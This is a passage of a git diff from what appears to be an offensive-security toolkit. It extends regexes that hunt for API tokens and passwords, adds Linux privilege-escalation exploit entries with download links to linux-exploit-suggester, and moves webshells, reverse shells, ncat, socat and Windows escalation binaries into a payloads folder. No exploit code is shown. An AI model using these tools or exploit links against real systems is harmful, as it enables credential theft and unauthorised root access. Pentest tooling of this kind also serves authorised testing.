digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd| docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token| dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid| dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key| encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key| env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password| file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret| flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username| gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret| gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token| gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email| git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token| github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username| github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo| github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret| google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys| gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token| hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token| hub_dxia2_password)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" - search_for_regex "Generic API tokens search (I-R)" "(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets| ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url| keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username| lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret| lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password| mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key| mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken| manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key| mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid| multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password| mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password| nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey| non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey| nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds| oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret| okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password| org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret| ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key| personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass| postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id| prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token| quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure| release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key| route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" - search_for_regex "Generic API tokens search (S-Z)" "(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key| s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token| sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token| sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0| secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey| secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user| sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key| ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space| slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token| socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase| sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret| soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey| sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id| star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret| strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token| test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token| travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret| twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret| twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh| user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key| vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password| watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password| widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key| wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com| yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret| yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_ .,<\-]{0,25}(=|>|:=|\|\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\-]{8,64})['\"]" + search_for_regex "Generic API tokens search (A-C)" "(access_key|access_token|account_sid|admin_email|admin_pass|admin_user|adzerk_api_key|algolia_admin_key|algolia_api_key| algolia_search_key|alias_pass|alicloud_access_key|alicloud_secret_key|amazon_bucket_name|amazon_secret_access_key| amazonaws|anaconda_token|android_docs_deploy_token|ansible_vault_password|aos_key|aos_sec| api_key|api_key_secret|api_key_sid|api_secret|apiary_api_key|apigw_access_token|api.googlemaps|AIza|apidocs| apikey|apiSecret|app_bucket_perm|appclientsecret|app_debug|app_id|appkey|appkeysecret|app_key|app_log_level|app_report_token_key| app_secret|app_token|apple_id_password|application_key|appsecret|appspot|argos_token|artifactory_key|artifacts_aws_access_key_id| artifacts_aws_secret_access_key|artifacts_bucket|artifacts_key|artifacts_secret|assistant_iam_apikey|auth0_api_clientsecret| auth0_client_secret|auth_token|authorizationToken|author_email_addr|author_npm_api_key|authsecret|awsaccesskeyid|aws_access| aws_access_key|aws_access_key_id|aws_bucket|aws_config_accesskeyid|aws_key|aws_secret|aws_secret_access_key|awssecretkey| aws_secret_key|aws_secrets|aws_ses_access_key_id|aws_ses_secret_access_key|aws_token|awscn_access_key_id|awscn_secret_access_key| AWSSecretKey|b2_app_key|b2_bucket|bashrc password|bintray_api_key|bintray_apikey|bintray_gpg_password|bintray_key| bintray_token|bintraykey|bluemix_api_key|bluemix_auth|bluemix_pass|bluemix_pass_prod|bluemix_password|bluemix_pwd|bluemix_username brackets_repo_oauth_token|browser_stack_access_key|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id| bucketeer_aws_secret_access_key|built_branch_deploy_key|bundlesize_github_token|bx_password|bx_username|cache_driver| cache_s3_secret_key|cargo_token|cattle_access_key|cattle_agent_instance_auth|cattle_secret_key|censys_secret|certificate_password| cf_password|cheverny_token|chrome_client_secret|chrome_refresh_token|ci_deploy_password|ci_project_url|ci_registry_user| ci_server_name|ci_user_token|claimr_database|claimr_db|claimr_superuser|claimr_token|cli_e2e_cma_token|client_secret| client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key| cloudant_archived_database|cloudant_audited_database|cloudant_database|cloudant_instance|cloudant_order_database| cloudant_parsed_database|cloudant_password|cloudant_processed_database|cloudant_service_database| cloudflare_api_key|cloudflare_auth_email|cloudflare_auth_key|cloudflare_email|cloudinary_api_secret|cloudinary_name| cloudinary_url|cloudinary_url_staging|clu_repo_url|clu_ssh_private_key_base64|cn_access_key_id|cn_secret_access_key| cocoapods_trunk_email|cocoapods_trunk_token|codacy_project_token|codeclimate_repo_token|codecov_token|coding_token| conekta_apikey|conn.login|connectionstring|consumerkey|consumer_key|consumer_secret|contentful_access_token| contentful_cma_test_token|contentful_integration_management_token|contentful_integration_management_token| contentful_management_api_access_token|contentful_management_api_access_token_new|contentful_php_management_test_token| contentful_test_org_cma_token|contentful_v2_access_token|conversation_password|conversation_username|cos_secrets| coveralls_api_token|coveralls_repo_token|coveralls_token|coverity_scan_token|credentials| cypress_record_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" + search_for_regex "Generic API tokens search (D-H)" "(danger_github_api_token|database_host|database_name|database_password|database_port|database_schema_test| database_user|database_username|datadog_api_key|datadog_app_key|db_connection|db_database|db_host|db_password| db_pw|db_server|db_user|db_username|dbpasswd|dbpassword|dbuser|ddg_test_email|ddg_test_email_pw|ddgc_github_token| deploy_password|deploy_secure|deploy_token|deploy_user|dgpg_passphrase|digitalocean_access_token| digitalocean_ssh_key_body|digitalocean_ssh_key_ids|docker_hub_password|docker_key|docker_pass|docker_passwd| docker_password|docker_postgres_url|docker_token|dockerhub_password|dockerhubpassword|doordash_auth_token| dot-files|dotfiles|dropbox_oauth_bearer|droplet_travis_password|dsonar_login|dsonar_projectkey|dynamoaccesskeyid| dynamosecretaccesskey|elastic_cloud_auth|elastica_host|elastica_port|elasticsearch_password|encryption_key| encryption_password|end_user_password|env_github_oauth_token|env_heroku_api_key|env_key|env_secret|env_secret_access_key| env_sonatype_password|eureka_awssecretkey|env.heroku_api_key|env.sonatype_password|eureka.awssecretkey|exp_password| file_password|firebase_api_json|firebase_api_token|firebase_key|firebase_project_develop|firebase_token|firefox_secret| flask_secret_key|flickr_api_key|flickr_api_secret|fossa_api_key|ftp_host|ftp_login|ftp_password|ftp_pw|ftp_user|ftp_username| gcloud_bucket|gcloud_project|gcloud_service_key|gcr_password|gcs_bucket|gh_api_key|gh_email|gh_next_oauth_client_secret| gh_next_unstable_oauth_client_id|gh_next_unstable_oauth_client_secret|gh_oauth_client_secret|gh_oauth_token|gh_repo_token| gh_token|gh_unstable_oauth_client_secret|ghb_token|ghost_api_key|git_author_email|git_author_name|git_committer_email| git_committer_name|git_email|git_name|git_token|github_access_token|github_api_key|github_api_token|github_auth|github_auth_token| github_auth_token|github_client_secret|github_deploy_hb_doc_pass|github_deployment_token|github_hunter_token|github_hunter_username| github_key|github_oauth|github_oauth_token|github_oauth_token|github_password|github_pwd|github_release_token|github_repo| github_token|github_tokens|gitlab_user_email|gogs_password|google_account_type|google_client_email|google_client_id|google_client_secret| google_maps_api_key|google_private_key|gpg_key_name|gpg_keyname|gpg_ownertrust|gpg_passphrase|gpg_private_key|gpg_secret_keys| gradle_publish_key|gradle_publish_secret|gradle_signing_key_id|gradle_signing_password|gren_github_token|grgit_user|hab_auth_token| hab_key|hb_codesign_gpg_pass|hb_codesign_key_pass|heroku_api_key|heroku_email|heroku_token|hockeyapp_token|homebrew_github_api_token| hub_dxia2_password)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" + search_for_regex "Generic API tokens search (I-R)" "(ij_repo_password|ij_repo_username|index_name|integration_test_api_key|integration_test_appid|internal_secrets| ios_docs_deploy_token|itest_gh_token|jdbc_databaseurl|jdbc_host|jdbc:mysql|jwt_secret|kafka_admin_url|kafka_instance_name|kafka_rest_url| keystore_pass|kovan_private_key|kubecfg_s3_path|kubeconfig|kxoltsn3vogdop92m|leanplum_key|lektor_deploy_password|lektor_deploy_username| lighthouse_api_key|linkedin_client_secretorlottie_s3_api_key|linux_signing_key|ll_publish_url|ll_shared_key|looker_test_runner_client_secret| lottie_happo_api_key|lottie_happo_secret_key|lottie_s3_secret_key|lottie_upload_cert_key_password|lottie_upload_cert_key_store_password| mail_password|mailchimp_api_key|mailchimp_key|mailer_password|mailgun_api_key|mailgun_apikey|mailgun_password|mailgun_priv_key| mailgun_pub_apikey|mailgun_pub_key|mailgun_secret_api_key|manage_key|manage_secret|management_token|managementapiaccesstoken| manifest_app_token|manifest_app_url|mapbox_access_token|mapbox_api_token|mapbox_aws_access_key_id|mapbox_aws_secret_access_key| mapboxaccesstoken|mg_api_key|mg_public_api_key|mh_apikey|mh_password|mile_zero_key|minio_access_key|minio_secret_key|multi_bob_sid| multi_connect_sid|multi_disconnect_sid|multi_workflow_sid|multi_workspace_sid|my_secret_env|mysql_database|mysql_hostname|mysql_password| mysql_root_password|mysql_user|mysql_username|mysqlmasteruser|mysqlsecret|nativeevents|netlify_api_key|new_relic_beta_token|nexus_password| nexuspassword|ngrok_auth_token|ngrok_token|node_env|node_pre_gyp_accesskeyid|node_pre_gyp_github_token|node_pre_gyp_secretaccesskey| non_token|now_token|npm_api_key|npm_api_token|npm_auth_token|npm_email|npm_password|npm_secret_key|npm_token|nuget_api_key|nuget_apikey| nuget_key|numbers_service_pass|oauth_token|object_storage_password|object_storage_region_name|object_store_bucket|object_store_creds| oc_pass|octest_app_password|octest_app_username|octest_password|ofta_key|ofta_region|ofta_secret|okta_client_token|okta_oauth2_client_secret| okta_oauth2_clientsecret|onesignal_api_key|onesignal_user_auth_key|open_whisk_key|openwhisk_key|org_gradle_project_sonatype_nexus_password| org_project_gradle_sonatype_nexus_password|os_auth_url|os_password|ossrh_jira_password|ossrh_pass|ossrh_password|ossrh_secret| ossrh_username|packagecloud_token|pagerduty_apikey|parse_js_key|passwordtravis|paypal_client_secret|percy_project|percy_token|personal_key| personal_secret|pg_database|pg_host|places_api_key|places_apikey|plotly_apikey|plugin_password|postgresql_db|postgresql_pass| postgres_env_postgres_db|postgres_env_postgres_password|preferred_username|pring_mail_username|private_signing_password|prod_access_key_id| prod_password|prod_secret_key|project_config|publish_access|publish_key|publish_secret|pushover_token|pypi_passowrd|qiita_token| quip_token|rabbitmq_password|randrmusicapiaccesstoken|redis_stunnel_urls|rediscloud_url|refresh_token|registry_pass|registry_secure| release_gh_token|release_token|reporting_webdav_pwd|reporting_webdav_url|repotoken|rest_api_key|rinkeby_private_key|ropsten_private_key| route53_access_key_id|rtd_key_pass|rtd_store_pass|rubygems_auth_token)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" + search_for_regex "Generic API tokens search (S-Z)" "(s3_access_key|s3_access_key_id|s3_bucket_name_app_logs|s3_bucket_name_assets|s3_external_3_amazonaws_com|s3_key| s3_key_app_logs|s3_key_assets|s3_secret_app_logs|s3_secret_assets|s3_secret_key|s3_user_secret|sacloud_access_token| sacloud_access_token_secret|sacloud_api|salesforce_bulk_test_password|salesforce_bulk_test_security_token| sandbox_access_token|sandbox_aws_access_key_id|sandbox_aws_secret_access_key|sauce_access_key|scrutinizer_token|sdr_token|secret_0| secret_1|secret_10|secret_11|secret_2|secret_3|secret_4|secret_5|secret_6|secret_7|secret_8|secret_9|secret_key_base|secretaccesskey| secret_key_base|segment_api_key|selion_log_level_dev|selion_selenium_host|sendgrid|sendgrid_api_key|sendgrid_key|sendgrid_password|sendgrid_user| sendgrid_username|sendwithus_key|sentry_auth_token|sentry_default_org|sentry_endpoint|sentry_secret|sentry_key|service_account_secret|ses_access_key| ses_secret_key|setdstaccesskey|setdstsecretkey|setsecretkey|signing_key|signing_key_password|signing_key_secret|signing_key_sid|slash_developer_space| slash_developer_space_key|slate_user_email|snoowrap_client_secret|snoowrap_password|snoowrap_refresh_token|snyk_api_token|snyk_token| socrata_app_token|socrata_password|sonar_organization_key|sonar_project_key|sonar_token|sonatype_gpg_key_name|sonatype_gpg_passphrase| sonatype_nexus_password|sonatype_pass|sonatype_password|sonatype_token_password|sonatype_token_user|sonatypepassword|soundcloud_client_secret| soundcloud_password|spaces_access_key_id|spaces_secret_access_key|spotify_api_access_token|spotify_api_client_secret|spring_mail_password|sqsaccesskey| sqssecretkey|square_reader_sdk_repository_password|srcclr_api_token|sshpass|ssmtp_config|staging_base_url_runscope|star_test_aws_access_key_id| star_test_bucket|star_test_location|star_test_secret_access_key|starship_account_sid|starship_auth_token|stormpath_api_key_id|stormpath_api_key_secret| strip_publishable_key|strip_secret_key|stripe_private|stripe_public|surge_login|surge_token|svn_pass|tesco_api_key|test_github_token| test_test|tester_keys_password|thera_oss_access_key|token_core_java|travis_access_token|travis_api_token|travis_branch|travis_com_token|travis_e2e_token| travis_gh_token|travis_pull_request|travis_secure_env_vars|travis_token|trex_client_token|trex_okta_client_token|twilio_api_key|twilio_api_secret| twilio_chat_account_api_service|twilio_configuration_sid|twilio_sid|twilio_token|twine_password|twitter_consumer_key|twitter_consumer_secret|twitteroauthaccesssecret| twitteroauthaccesstoken|unity_password|unity_serial|urban_key|urban_master_secret|urban_secret|us_east_1_elb_amazonaws_com|use_ssh| user_assets_access_key_id|user_assets_secret_access_key|usertravis|v_sfdc_client_secret|v_sfdc_password|vip_github_build_repo_deploy_key|vip_github_deploy_key| vip_github_deploy_key_pass|virustotal_apikey|visual_recognition_api_key|vscetoken|wakatime_api_key|watson_conversation_password|watson_device_password| watson_password|widget_basic_password|widget_basic_password_2|widget_basic_password_3|widget_basic_password_4|widget_basic_password_5|widget_fb_password| widget_fb_password_2|widget_fb_password_3|widget_test_server|wincert_password|wordpress_db_password|wordpress_db_user|wpjm_phpunit_google_geocode_api_key| wporg_password|wpt_db_password|wpt_db_user|wpt_prepare_dir|wpt_report_api_key|wpt_ssh_connect|wpt_ssh_private_key_base64|www_googleapis_com| yangshun_gh_password|yangshun_gh_token|yt_account_client_secret|yt_account_refresh_token|yt_api_key|yt_client_secret|yt_partner_client_secret| yt_partner_refresh_token|yt_server_api_key|zensonatypepassword|zhuliang_gh_token|zopim_account_key)[a-z0-9_ .,<\\-]{0,25}(=|>|:=|\\|\\|:|<=|=>|:).{0,5}['\"]([0-9a-zA-Z_=\\-]{8,64})['\"]" search_for_regex "Net user add" "net user .+ /add" echo '' @@ -8572,6 +11277,9 @@ else echo "Regexes to search for API keys aren't activated, use param '-r' " fi +fi + +fi fi echo '' diff --git a/linux-exploit-suggester.sh b/payloads/linux/linux-exploit-suggester.sh similarity index 96% rename from linux-exploit-suggester.sh rename to payloads/linux/linux-exploit-suggester.sh index c20957a..0b94dc8 100755 --- a/linux-exploit-suggester.sh +++ b/payloads/linux/linux-exploit-suggester.sh @@ -1,7 +1,7 @@ #!/bin/bash # -# Copyright (c) 2016-2023, https://github.com/mzet- +# Copyright (c) 2016-2026, https://github.com/mzet- # # linux-exploit-suggester.sh comes with ABSOLUTELY NO WARRANTY. # This is free software, and you are welcome to redistribute it @@ -9,7 +9,7 @@ # file for usage of this software. # -VERSION=v1.1 +VERSION=v1.2 # bash colors #txtred="\e[0;31m" @@ -852,6 +852,18 @@ author: wbowling (orginal exploit author); bcoles (author of exploit update at ' EOF ) +EXPLOITS[((n++))]=$(cat <=4.14.1,ver<=4.14.54 +Tags: debian=8,RHEL=6|7 +Rank: 1 +analysis-url: https://www.qualys.com/2018/09/25/cve-2018-14634/mutagen-astronomy-integer-overflow-linux-create_elf_tables-cve-2018-14634.txt +exploit-db: 45516 +Comments: systems with less than 32GB of RAM are unlikely to be affected by this issue +author: Qualys +EOF +) + EXPLOITS[((n++))]=$(cat <=4.15,ver<=4.19.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1,cmd:[ -u /usr/bin/newuidmap ],cmd:[ -u /usr/bin/newgidmap ] @@ -916,6 +928,18 @@ author: chompie1337 EOF ) +EXPLOITS[((n++))]=$(cat <=3.13,ver<5.14,x86_64 +Tags: ubuntu=(14.04|16.04|18.04|20.04|20.10) +Rank: 1 +analysis-url: https://ssd-disclosure.com/ssd-advisory-overlayfs-pe/ +src-url: https://raw.githubusercontent.com/briskets/CVE-2021-3493/refs/heads/main/exploit.c +Comments: Only Ubuntu is affected. +author: ssd-disclosure +EOF +) + EXPLOITS[((n++))]=$(cat <=2.6.19,ver<=5.12-rc6 @@ -937,11 +961,25 @@ Tags: ubuntu=(20.04|21.04),debian=11 Rank: 1 analysis-url: https://dirtypipe.cm4all.com/ src-url: https://haxx.in/files/dirtypipez.c +bof-url: https://raw.githubusercontent.com/The-Z-Labs/bof-launcher/refs/heads/main/bofs/src/dirtypipe.zig +Comments: BOF version o the exploit available to be run with bof-launcher. exploit-db: 50808 author: blasty (original exploit author: Max Kellermann) EOF ) +EXPLOITS[((n++))]=$(cat <=5.8,ver<5.16.5,x86_64 +Tags: ubuntu=21.10{kernel:5.13.0.37-generic} +Rank: 1 +analysis-url: https://github.com/Bonfee/CVE-2022-0995 +src-url: https://github.com/Bonfee/CVE-2022-0995/archive/refs/heads/main.zip +Comments: Not 100% reliable, may need to be run a couple of times. It rare cases it may panic the kernel. +author: Bonfee (vulnerability discovery and PoC: Jann Horn) +EOF +) + EXPLOITS[((n++))]=$(cat <=3.16,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 @@ -967,6 +1005,30 @@ author: vulnerability discovery: EDG Team from NCC Group; Author of this exploit EOF ) +EXPLOITS[((n++))]=$(cat <=5.11,ver<=6.2,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 +Tags: ubuntu=22.04.1{kernel:5.15.0-57-generic} +Rank: 1 +analysis-url: https://securitylabs.datadoghq.com/articles/overlayfs-cve-2023-0386/ +src-url: https://github.com/xkaneiki/CVE-2023-0386/archive/refs/heads/main.zip +Comments: CONFIG_USER_NS needs to be enabled && kernel.unprivileged_userns_clone=1 required +author: vuln discovery: Miklos Szeredi; exploit author: xkaneiki +EOF +) + +EXPLOITS[((n++))]=$(cat <=5.14,ver<=6.6,CONFIG_NF_TABLES=y,CONFIG_USER_NS=y,sysctl:kernel.unprivileged_userns_clone==1 +Tags: debian=12,ubuntu=22.04 +Rank: 1 +analysis-url: https://pwning.tech/nftables/ +src-url: https://github.com/Notselwyn/CVE-2024-1086/archive/refs/heads/main.zip +Comments: CONFIG_USER_NS and CONFIG_NF_TABLES need to be enabled && kernel.unprivileged_userns_clone=1 required +author: notselwyn +EOF +) + ############ USERSPACE EXPLOITS ########################### n=0 @@ -1539,6 +1601,17 @@ author: berdav EOF ) +EXPLOITS_USERSPACE[((n++))]=$(cat <=1.9.14,ver<=1.9.17 +Tags: ubuntu=24.04.1,fedora=41 +Rank: 1 +analysis-url: https://www.stratascale.com/resource/cve-2025-32463-sudo-chroot-elevation-of-privilege/ +src-url: https://github.com/mirchr/CVE-2025-32463-sudo-chwoot/archive/refs/heads/main.zip +author: Rich Mirch +EOF +) + ########################################################### ## security related HW/kernel features ########################################################### @@ -1828,11 +1901,11 @@ EOF version() { - echo "linux-exploit-suggester "$VERSION", mzet, https://z-labs.eu, March 2019" + echo "linux-exploit-suggester $VERSION by mzet" } usage() { - echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by @_mzet_" + echo "LES ver. $VERSION (https://github.com/mzet-/linux-exploit-suggester) by mzet" echo echo "Usage: linux-exploit-suggester.sh [OPTIONS]" echo @@ -2626,6 +2699,7 @@ for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do EXPLOIT_DB=$(echo "$EXP" | grep "exploit-db: " | awk '{print $2}') analysis_url=$(echo "$EXP" | grep "analysis-url: " | awk '{print $2}') ext_url=$(echo "$EXP" | grep "ext-url: " | awk '{print $2}') + bof_url=$(echo "$EXP" | grep "bof-url: " | awk '{print $2}') comments=$(echo "$EXP" | grep "Comments: " | cut -d' ' -f 2-) reqs=$(echo "$EXP" | grep "Reqs: " | cut -d' ' -f 2) @@ -2679,6 +2753,7 @@ for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do [ -n "$tags" ] && echo -e " Tags: $tags" echo -e " Download URL: $src_url" [ -n "$ext_url" ] && echo -e " ext-url: $ext_url" + [ -n "$bof_url" ] && echo -e " bof-url: $bof_url" [ -n "$comments" ] && echo -e " Comments: $comments" # handles --full filter option diff --git a/lse.sh b/payloads/linux/lse.sh similarity index 100% rename from lse.sh rename to payloads/linux/lse.sh diff --git a/ncat b/payloads/linux/ncat similarity index 100% rename from ncat rename to payloads/linux/ncat diff --git a/pspy b/payloads/linux/pspy similarity index 100% rename from pspy rename to payloads/linux/pspy diff --git a/pspy64 b/payloads/linux/pspy64 similarity index 100% rename from pspy64 rename to payloads/linux/pspy64 diff --git a/socat b/payloads/linux/socat similarity index 100% rename from socat rename to payloads/linux/socat diff --git a/socat64 b/payloads/linux/socat64 similarity index 100% rename from socat64 rename to payloads/linux/socat64 diff --git a/unix-privesc-check.sh b/payloads/linux/unix-privesc-check.sh similarity index 100% rename from unix-privesc-check.sh rename to payloads/linux/unix-privesc-check.sh diff --git a/uptux.py b/payloads/linux/uptux.py similarity index 100% rename from uptux.py rename to payloads/linux/uptux.py diff --git a/pingscan.py b/payloads/pingscan.py similarity index 100% rename from pingscan.py rename to payloads/pingscan.py diff --git a/portscan.py b/payloads/portscan.py similarity index 100% rename from portscan.py rename to payloads/portscan.py diff --git a/jsp-webshell.jsp b/payloads/web/jsp-webshell.jsp similarity index 100% rename from jsp-webshell.jsp rename to payloads/web/jsp-webshell.jsp diff --git a/p0wny-shell.php b/payloads/web/p0wny-shell.php similarity index 100% rename from p0wny-shell.php rename to payloads/web/p0wny-shell.php diff --git a/php-reverse-shell.php b/payloads/web/php-reverse-shell.php similarity index 100% rename from php-reverse-shell.php rename to payloads/web/php-reverse-shell.php diff --git a/sql.php b/payloads/web/sql.php similarity index 100% rename from sql.php rename to payloads/web/sql.php diff --git a/win/Certify.exe b/payloads/windows/Certify.exe similarity index 100% rename from win/Certify.exe rename to payloads/windows/Certify.exe diff --git a/win/FullPowers.exe b/payloads/windows/FullPowers.exe similarity index 100% rename from win/FullPowers.exe rename to payloads/windows/FullPowers.exe diff --git a/win/GetUserSPNs.ps1 b/payloads/windows/GetUserSPNs.ps1 similarity index 100% rename from win/GetUserSPNs.ps1 rename to payloads/windows/GetUserSPNs.ps1 diff --git a/win/GodPotato.exe b/payloads/windows/GodPotato.exe similarity index 100% rename from win/GodPotato.exe rename to payloads/windows/GodPotato.exe diff --git 